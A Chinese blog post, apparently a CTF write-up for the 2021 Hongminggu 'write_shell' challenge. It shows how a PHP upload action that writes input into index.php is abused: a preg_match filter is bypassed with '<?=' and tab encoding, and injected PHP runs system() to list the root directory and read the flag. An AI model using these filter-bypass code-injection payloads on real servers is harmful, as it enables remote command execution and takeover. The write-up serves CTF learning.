[红明谷CTF 2021]write_shell --不会编程的崽

本文介绍了如何通过分析上传文件过程中的漏洞,利用MD5加密绕过过滤规则,实现命令执行,最终在root目录下获取flag。作者详细展示了从上传原理到利用payload获取flag的整个过程。
摘要由CSDN通过智能技术生成

今天这个也挺简单的。开始上源码

看见了upload。文件上传??

大概含义是选择upload,然后传入data,并将data写入index.php。先访问一下upload吧

?action=upload&data=1

 上传成功。

找到上传路径。源码上写md5加密的remoteaddr,然后又去找外网ip,结果没啥结果。。。但其实路径就在action这

?action=pwd

 

路径和上传原理搞清楚了。开始绕preg_match

过滤还算比较少,主要是空格,"_","php"被过滤了 

"=" 代替 "php"

"%09" 代替 空格

但是"_"怎么被替换呢?因为这玩意涉及到一句话木马。所以,不用不就不需要绕过了。

命令执行也不是不行。 

?action=upload&data=<?=%09assert(system("ls%09/"))?>

没有拦截,访问index.php

 

flag就在根目录下

?action=upload&data=<?=%09assert(system("cat%09/flllllll1112222222lag"))?>

再上述payload,最后访问index.php就拿到flag了 

  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值